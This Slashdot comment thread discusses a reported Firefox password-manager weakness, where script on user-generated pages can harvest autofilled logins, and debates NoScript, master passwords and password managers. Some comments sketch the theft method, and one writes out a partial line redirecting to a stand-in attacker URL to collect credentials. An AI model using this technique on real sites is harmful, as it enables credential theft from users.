Holes Remain Open in Firefox Password Manager 191
juct writes "Although the Mozilla developers have fixed a known hole in the password manager of Firefox & Co, a door remains open for exploitation. According to an article on the heise site, hackers can still use JavaScript to steal passwords from users of the Mozilla, Firefox, and Safari browsers. However, the real problem might not be Firefox' password manager. If users can set up their own pages containing script code on a server, the JavaScript security model breaks. Heise Security demonstrates the possible password theft in a demo. 'From the users' perspective, this means that they should not entrust their passwords to the password manager on web sites that allow other users to create their own pages containing scripts. Otherwise somebody can easily create a page that steals the password as soon as the page is opened ... Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.'"
Firefox no longer safe? (Score:4, Funny)
Re:Firefox no longer safe? (Score:4, Funny)
Re:Firefox no longer safe? (Score:5, Insightful)
But they can only "steal" the passwords of that website. They can't steal your all passwords. So just remember to select different passwords for websites that might allow users to insert Javascript code on the site. So it doesn't matter that much if they manage to steal your passwords.
Or use Noscript as suggested. Or simply don't use such websites, as they clearly don't think much about user's security.
Re:Firefox no longer safe? (Score:4, Insightful)
This brings up another thought. If the websites in question allow users to post javascript, and there happens to be a login section on that page, then couldn't the user posting the script add an onchange or onkeypress event to the username and password fields to capture the username and password, and then forward the information to their server by creating an img element, and having the username and password passed as GET variables appended to the URL of the img src, which is in fact just a php page that stores the username and password in a database. Seems to me that any site that allows people to post executable javascript is just asking for trouble.
Re: (Score:2)
Re: (Score:3, Interesting)
Re: (Score:2)
Re: (Score:3, Insightful)
Because it's always clear what sites these are?
Re: (Score:2, Insightful)
So just remember to select different passwords for websites that might allow users to insert Javascript code on the site. So it doesn't matter that much if they manage to steal your passwords.
I use the same crappy password on a whole bunch of sites. If someone steals it, they can deface my Facebook page, use my nick on IRC, post on Slashdot under my name. Who knows, it might get modded up for once. There are a limited number of nonguessable, easy to remember passwords in my life, I won't waste them on wikis, forums, and myspace.
My bank, bills and credit card each have their own password and username however. As do my computer and email.
Re: (Score:2)
Please. "It is not about safety of the Outlook. It is about safety of ISPs that allows users to insert code in their email."
Re: (Score:2)
Of course, if a website allows visitors to inject javascript, they can steal passwords even if they're not in password manager, just cause a page to come up that looks like the login page and most people will "log back in" using the fake form.
For that matter, according to one study, just saying "Go to example.com and give me your password and I'll send you a candy bar!" will work fine.
Re: (Score:2, Funny)
Get the Firefox patch here [opera.com]
Godsdamnit, I know you're just trying to be funny in the same way as everyone else with their "Ultimate Windows patches", but it isn't.
You could have gone for insightful instead of trolling by writing something along the lines of "Generally, Opera has a much better safety record (the one we know of, anyway), and I prefer the UI."
I really like Opera, I even have it on my 3 phones and my PDA. Plus my 2 laptops, 4 stationaries, and I'm currently reading a book inspired by Opera [wikipedia.org]. (Sorry, bad pun)
Trolling, h
Re: (Score:2)
Possible fix (Score:5, Interesting)
Secure Login extension (Score:4, Informative)
You know, that's not a bad idea. Apparently someone else had it too. Check out the Secure Login [mozilla.org] extension. It doesn't use a right click (although I kinda wish it did; may have to suggest that) but it does have a shortcut key and an icon.
Thanks for saying that; I would have never thought to go looking for such an extension without you saying it.
Re: (Score:2)
Re: (Score:2)
Actually, it wouldn't. It would prevent this simple javascript "exploit", but you can adjust the tactic for this. Now you would just either wait for the login form to lose focus or to be submitted. Click on the submit button, trigger the onSubmit handler that you can craft because someone was stupid enough to allow users to do javascript, and we're down the same road again.
You should never allow unt
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Well, the exploit in question does deal with some user forging a login form and adding some javascript to a webpage on the domain he's visiting. From the article:
Re: (Score:2, Interesting)
password complexity (Score:5, Interesting)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
In other words...
YOURE DOING IT WRONG.
Re: (Score:2)
And FFS, don't put stupid things like how much a given user is being paid into the LDAP; that's just asking for trouble.
Clarification (Score:5, Informative)
Users could also disable JavaScript, which in the age of Web2.0 would cause many pages to display incorrectly. A better alternative is NoScript! [noscript.net], an add-on that allows users to selectively white-list pages, servers, or domains to use JavaScript.
Re:Clarification (Score:4, Interesting)
Take MySpace. How do you want to handle it? Whitelist MySpace as a whole? Then you got no security. Whitelist certain user pages? Then someone who browses userpages has essentially the equivalent of having JS turned off and gets bugged every 2 seconds. And the potential problem that someone might generate content you want to see and bug it.
The problem is not that certain domains are "evil". Ok, that problem exists, too, but it's a very different problem. The problem is that it's now possible to put malicious script code into user generated content, and that other content on the same server and domain is what people want to see.
Re: (Score:2, Insightful)
Usually my NoScript when blocking Java has a list of about 5 or 6 current sites running scripts (ad-servers and whatnot, ads.google.com comes up on almost every page), and anything other than the trusted site i'm at NEVER gets whitelisted, it's just not worth the risk. It's a hell of a lot better running a crippled 2.0 website than losing control of what's coming into my computer. I don't need to see all your pretty java crap, and a good site doesn't rely on java to display co
Re: (Score:3, Informative)
Then someone who browses userpages has essentially the equivalent of having JS turned off and gets bugged every 2 seconds. And the potential problem that someone might generate content you want to see and bug it.
Gets bugged every 2 seconds? Have you used NoScript? It provides a very minimally intrusive bar along the bottom of the browser stating "NoScript has blocked X number of scripts", and you can even turn that off. And without scripting enabled on a page, how do you expect the page to "bug" users to enable JavaScript? The very best they can do is provide a <noscript> tag asking for it -- and then we'd be assuming the user can make the decision themselves.
Browsing websites such as MySpace works fine with
Re: (Score:2)
Re: (Score:2)
Firefox password manager (Score:5, Interesting)
It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same.
Re: (Score:3, Insightful)
The fact that a program running on your machine as you can read your passwords is only marginally disturbing.
Re:Firefox password manager (Score:5, Informative)
Once you do that it won't be able to read them either.
Its failure to read the Opera ones means either A) you set a master password in Opera or B) no one cares about Opera so program doesn't even look for them.
Re: (Score:2)
Re: (Score:2)
Re:Firefox password manager (Score:4, Informative)
Re: (Score:2)
All other options are simply obfuscation. Unless there is a piece of information you add to the mix, all the "ingredients" to reverse it are sitting right there on your HD.
Your rambling commentary above boils down to simply:
Opera obfuscates passwords by default.
Firefox obfuscates passwords by default.
The only difference is your program you used reversed Firefox's. Again, since you did not se
Re: (Score:2)
You just don't get it, do you?
Why didn't the author of this program succeed in deobfuscating my passwords in Opera?
Three reasons:
1) It closed source, and therefore more difficult to figure out how to get at the passwords
2) The password file is much more heavily obfuscated
3) There aren't as many Opera users out there, and therefore it is less economical to spend time to properly figure out how to get at the passwords (I repeat, the program does attempt to get at Opera's passwords, it merely fails to succeed)
What this boils down to--exac
Re: (Score:2)
Obfuscation is not secure. Period.
The closed source thing is ridiculous, if anyone really cared and had any monetary incentive (and with passwords there surely is) they could easily deobfuscate, closed source or not.
Security through obscurity is never the answer.
The smaller user base *is* legitimate, and a good argument for a browser ecology, but it is not an endorsement of any advantage to Opera's password management.
You should ALWAYS assume passwords that are not encrypted are essentially in the
Re: (Score:2)
Fix what problem?
If Firefox can get to your passwords (without your input), then so can any other program (that has the same priviledges). There's nothing that can be done about it.
Re: (Score:2)
Re: (Score:2)
It's right. No matter how creative you want to be, there's nothing that can be done.
Worst case, modify Firefox itself (the source is available) so that it spits out plaintext passwords. In practice you can just as easily (and more conveniently) rip out the de-obfuscation code.
Re: (Score:2)
Well, any program running with user rights can probably read the firefox passwords, since they are not hard for a user to obtain. Just go into "Options" > "Security" > "Show Passwords..." > "Show Passwords" and click "Yes" on the confirmation dialog. You'll see all the stored passwords in plaintext. This means that your passwords can be read without trouble. For instanc
Re: (Score:2)
To clarify (before someone points out my mistake!): I see that Firefox has a "Set Master Password" option in the Security settings. What I should have said was:
Password Managers and Simple Passwords (Score:5, Insightful)
Don't tell me that an in-browser password manager stops people from using the same password everywhere. The average person sees "password" and a single phrase comes to mind. "Oh, my password is '12345'", they say to themselves, and enter that. They don't sit there and think, "Oh, I should keep my bank account password separate from my MySpace password."
Those two issues aside, people always use password managers of some kind or another. The difference is whether or not they are vulnerable to an attack. I happen to manage my passwords by memorizing them, whereas my father keeps his monitor covered in sticky notes. My password manager is more secure against people sitting at my desk, while his is more secure against old age, and both of them are safe from internet crackers.
I don't think there's much we can do about increasing people's password security other than increasing awareness and forcing better password standards.
Re: (Score:3, Insightful)
You're right. The real advantage of the password manager is that it's the only reasonable alternative to writing down all of those unique, complex, constantly changing passwords.
Re: (Score:2)
When's biometric security coming for the web? Scan my fingerprint to log into Slashdot?
Re: (Score:2)
That depends on the password manager. Firefox's password manager doesn't automatically create different passwords per site, but the pwdhash extension does. It hashes the site name with a master password to create a strong and site-specific password. There are several extensions that do this but pwdhash is my favorite.
Re: (Score:2)
What'd be nice if Firefox would automatically enter a very complicated random unique password into password signup form, save it, and automatically enter it into relevant password entry boxes. The user wouldn't even need to th
KeePass (Score:2, Informative)
OpenID (Score:2)
Safari?? (Score:2)
I tried it with Konqueror and default KDE 3.5 password saving tecnhology, and no password leaked this way. I wonder if Safari would have problems there.
Re: (Score:2)
My Password Manager is My Brain (Score:2)
With that said, I must admit that I am having more trouble remembering all of my passwords since I acquire more accounts and each account has different password requirements. I wis
Re: (Score:2)
Well my solution is to be selective about what passwords get saved. Low-priority things like slashdot and forum logins are fine for password managers. However I memorize, never write down, and never save passwords for financial sites. This keeps the number
Use the Secure Login FF Extension (Score:4, Informative)
This extension provides a *wand* like Opera has. (which is not affected by this security hole, because of this functionality).
https://addons.mozilla.org/en-US/firefox/addon/44
Re: (Score:2)
You could use this extension by itself or combine it with the Secure Login extension.
http://passwordmaker.org/ [passwordmaker.org]
Challenge/Response (Score:4, Insightful)
The downsides to this solution? 1) You need to have a browser that supports the protocol (no browsing in telnet). 2) You need to carry around your keys if you want to use them on more than one computer. 3) You need to explain it to users (but hopefully it can be almost transparent). I'm sure there are other problems but the current situation is untenable.
My Solution (Score:2, Interesting)
While I do use the PW Manager in Firefox, I have never allowed it to retain any critical pw's with those defined as any site where I enter financial or shipping information. For those sites, I use a dedicated PW Manager that allows me to generate more secure passwords using all available characters including special characters.
In the rare case that a website does not accept/allow special characters to be used for passwords, I tend to re-evaluate their value to me. I also notify both the webmaster and custo
Fanboi Fix. (Score:2)
Ok, I take that back. Forgot this is Firefox, not Safari.
Maybe I'm doing something wrong (or right...) (Score:2)
IE, is this more FUD-ey stuff that is very situational than practical?
Kwallet (Score:2)
Re: (Score:2)
Out of curiosity I ran the password stealing test (as well as all of the other Javascript tests) with Konqueror and they all passed with no information leaked.
One nice thing is Kwallet is outside of the browser with access control to various applications. This means that when Konq
Do not use password managers (Score:3, Interesting)
I rarely use a password manager, because I do not really trust them but also because, just as when using cookies to stay logged on a site, you just do not have to remember your password. This means that when you occasionnally want to log from another computer, for some urgent matter, you cannot find what your password was!
On the other hand, I generally use the same simplistic password on many sites just because there is no critical information on them. On some game sites, the most important information may be my real name and address if there is some incentive for this (read: prizes to win).
Strangely, one really critical site (my banking account) uses a not-so-hard password (6 digits), but this is constrained by the bank itself.
Not my problem (Score:2)
kwalletmanager (Score:2)
calling BS - should be classed as phishing (Score:3, Insightful)
This is the same old whore in new shoes. A javascript text entry masquerading as something else. You may as well point in apache's direction for htaccess too then.
As long as people do not think about what they are doing with their web browser, you will always have this problem. If people would think about web sites the same way they think about crossing a busy street the problem would be solved.
Use a different password for each site (Score:2, Interesting)
Using a different password for each site is the ultimate in security; however, without a password manager of some sort, it becomes too difficult to manage such a large list of passwords. Thankfully, OSS password managers such as Revelation [codepoet.no] and Figaro Password Manager [sourceforge.net] exist! Personally, I use revelation; however, both are excellent pieces of software!
--
Yahma
BlastProxy [blastproxy.com] - Anonymous & Secure web browsing
ProxyStorm [proxystorm.com] - Anonymous & Secure web browsing
LiarLiar [sf.net] - Open Source Voice Stress Analysis
Use Passwordmaker (Score:2)
Makes it trivial to have different, secure passwords for each site.
Better Idea (Score:2)
This means using passwords you can remember, rather than truly strong random passwords, which is a security problem in itself. But with some initial judicial selection of a manual password generation algorithm, this should be doable for most people. If you have a limited set of passwords you use frequently, especially for low value appli
Master Password Timeout 0.2.5 (Score:2)
Next time the browser wants to fill in a blank it ask for the master password, if you don't trust the site just press escape and nothing will happen !
Re:Thank goodness... (Score:4, Funny)
Re: (Score:3, Interesting)
The TSA guy was quoted in the article saying that "Taking lighters away is security theater." Nice to see someone in charge gets it, and, even more cho
Re: (Score:2)
How many sites have the login field on the user generated pages *and* allow users to post javascript?
Few, if any.
Re: (Score:3, Interesting)
Re: (Score:2)
Some sites, such as Slashdot and Wikipedia, use JavaScript, but only for extra functionality. You don't actually need it.
Some sites that do require JavaScript actually are kind enough to tell you if have JavaScript disabled, but there aren't that many that I've noticed.
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:3, Funny)
Re: (Score:2)
Not being a developer myself,I don't know have an idea about how to fix it, but this seems like an awful sticky technical problem.
Re: (Score:2)
Re: (Score:2, Informative)
Re:Lies, damned lies (Score:4, Informative)
Actually, the IE6 and IE7 password managers will most likely equally vulnerable. If you do a little looking at the code, all they really do is just scoop the login and pass from the input fields. Mozilla fills it in by default if only one login is available. I don't know exactly what IE does in this case, but I'm guessing that even if IE doesn't fill out the password right away, you can still add an extra onSubmit to the form and do your thing.
From the MSDN website [microsoft.com] I can quote:
So as far as I can tell, you just need to enter a username and be on the correct URL. If by URL they mean "exactly the same page" this won't work unless you can trick the browser somehow, but if it is "the same (sub)domain" it will. Since I don't have an IE at my disposal right now, I can't test it, but I suppose it will work when you use onSubmit.
document.location="http://some.hackers.url/collecThen redirect to the login page hoping that the site doesn't check referrers (most likely they don't), and you're set to go. Sites that allow users to enter HTML and especially javascript are begging for this sort of thing, and there are much worse things you can do once someone gives you free play with javascript anyway (cookies anyone?)
Just stating the obvious, although now I'm actually curious if this works on IE...
Re: (Score:3, Interesting)
The central concept in much of web-client security assumes that a domain is a single entity, and if you trust the domain, you trust the domain entirely. I don't see fault in this assumption
Re: (Score:2)
I know it will hurt all the fanboys, but the less secure browsers are: Firefox, Mozilla, Safari.
Uh, how does the existence of a specific exploit in Firefox make it a less secure browser than IE?
History disagrees with you.
If you can provide some hard evidence that IE is more secure than Firefox, we would all be interested in seeing it.
But we won't be holding our breath, either, for two reasons: one, there is no such evidence; two, you would probably not be capable of providing it even if it existed.
Re: (Score:2, Insightful)
Fanboy here. You're right. Got that outta the way
The problem is not really with the firefox password manager, because
1. Even if you only automatically entered a password with a push mechanism (right-click to fill in password information) then people would still do that on the "bad" scripts. The problem, like most things, is a problem of social hacking. Education is what is needed... maybe make firefox educational as it's logging into various login pages?
2. Remember the problem boils down to using your f
Re: (Score:2)
The problem with IE, was, for the longest time, that it did not provide standard protections. It always allowed the remote sever to control the users machin
Re:stupid features (Score:5, Insightful)
Or more specificly: Don't use internet. How many webmails you know that don't use password? You couldn't even write to Slashdot, except anonymously.
> Do you trust the your real life keys to be managed by a third party, then wonder how someone broke in your house without forced entry?
Yes, 3rd party has keys to our home. It is quite common with the apartment houses where I live. It is however quite unlikely that they would steal from us, as they would be number one suspects. So far I have never been robbed by they key holders, nor have I ever heard of a case that someone else had been.
> Having something "remember" your passwords defeats the purpose of having passwords.
Not really. It just makes the password behave more like client sertificates that automatically identify client to the server.
Re: (Score:2)
Breaking in to the appartment manager's office in order to steal keys to the other appartments is a pretty common strategy among burglers.
Re: (Score:2)
Half a dozen may be. Mailinator, my trash mail, bucket mail, dodgit, pookmail, and spambob. And don't worry about their domain names either, many of them have multiple domain names that their users donated to them.
Re: (Score:2, Insightful)
Ideally, you should have 8 or more characters in every password (12 or more is good, 16 or more is great), they shouldn't be based on English words or names (or anything else familiar), they should contain non-English characters, and so on. Plus, you should have a unique one for every use and site. I don't know about you, but I visit at least 20 - 30 sites with some regularity. So should I really remember hundreds of randomesque characters?
My
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Most of these 'remembered' passwords are completely useless to me, just some random site requires that I 'create an account' to, say, view the postings in it's forums. And that dumb site then requires '6+ mixed case letters with at least one number', when I would be happy with a blank password - there Firefox remembering this password is a nice thing.
Heck, I wouldn't even want to remember what username I have on these sites, I want it to 'just work' - if my co
Re: (Score:2)
There are quite a few suggestions on this thread on how to implement a more secure (but less convenient) password storage, but maybe a hybrid solution would be best ? Say, have a feature to mark a password as 'important', and Firefox would keep it encrypted, and wouldn't send it to webpages until you order to do so (like in Opera)..
Safest password manager in the world (Score:2)
I keep one in my safe, and whenever i forget a password, i consult it. The advantage of having the information offline is that nobody can hack it, and if someone steals your laptop, they don't get your passwords.
Of course, it's not 100% safe, there's the possibility of someone stealing the notebook. But I'm prepared for that case. I don't put the passwords directly, but instead write some hints based on information that only I know. Like "My friend Toby's former street address", and
Re: (Score:2)
This has been proven countless times to be highly vulnerable to social engineering attacks, such as targetted phishing. There is also a strong correlation between use of the "brain" system and persistently choosing weak passwords or reusing passwords across multiple sites.
In other words, it might work very well for you - if you have a good enough memory to sto